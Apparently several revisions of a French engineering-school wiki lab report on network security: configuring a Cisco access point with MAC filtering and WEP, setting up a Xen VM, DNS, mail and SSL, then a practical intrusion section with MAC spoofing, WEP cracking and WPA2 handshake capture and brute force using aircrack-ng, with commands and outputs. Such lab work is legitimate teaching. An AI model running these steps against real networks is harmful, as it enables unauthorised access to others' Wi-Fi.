</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
aircrack-ng -w Dico wpacracotte06-02.cap<br />
</pre><br />
<br />
après quelle que heures j'obtiens la clès:<br />
<pre><br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[02:00:57] 12399908 keys tested (1782.72 k/s)<br />
<br />
<br />
KEY FOUND! [ 12399906 ]<br />
<br />
<br />
Master Key : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B <br />
75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 <br />
<br />
Transient Key : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E <br />
94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E <br />
F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E <br />
22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E <br />
<br />
EAPOL HMAC : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD <br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23161
TP sysres IMA2a5 2015/2016 G3
2015-11-23T16:45:17Z
<p>Mstrunc : </p>
<hr />
<div><br /><br />
Ce mini projet a pour but de nous donner des notion en sécurité informatique.<br />
<br />
<br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<h2>Sécurisation Wifi par WPA2-EAP</h2><br />
<br />
<h3>Configuration du point d’accès</h3><br />
On commence par remettre le point d’accès en configuration d'usine <br />
<pre><br />
ap#erase startup-config<br />
ap#reload<br />
</pre><br />
<br />
Configuration:<br />
<pre><br />
ap(config)#line vty 0 15 <br />
ap(config-line)#password ****<br />
<br />
ap(config)#ip default-gateway 172.20.99.254<br />
<br />
ap(config)#interface bvi 1 <br />
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 <br />
</pre><br />
<br />
<br />
<br />
<br />
<h3>Configuration de la machine virtuel</h3><br />
<br />
<br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<pre><br />
#nano 000-domain.tld-ssl.conf<br />
<VirtualHost 193.48.57.181:443><br />
<br />
ServerName www.love-in-the-world.space<br />
ServerAlias love-in-the-world.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /root/chien.crt<br />
SSLCertificateKeyFile /root/chien.key<br />
SSLCertificateChainFile /root/gandi.crt<br />
SSLVerifyClient None<br />
<br />
</VirtualHost><br />
<br />
#a2enmod ssl<br />
#service apache2 reload<br />
</pre><br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
aircrack-ng -w Dico wpacracotte06-02.cap<br />
</pre><br />
<br />
après quelle que heures j'obtiens la clès:<br />
<pre><br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[02:00:57] 12399908 keys tested (1782.72 k/s)<br />
<br />
<br />
KEY FOUND! [ 12399906 ]<br />
<br />
<br />
Master Key : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B <br />
75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 <br />
<br />
Transient Key : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E <br />
94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E <br />
F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E <br />
22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E <br />
<br />
EAPOL HMAC : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD <br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23159
TP sysres IMA2a5 2015/2016 G3
2015-11-23T16:31:06Z
<p>Mstrunc : </p>
<hr />
<div><br /><br />
Ce mini projet a pour but de nous donner des notion en sécurité informatique.<br />
<br />
<br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
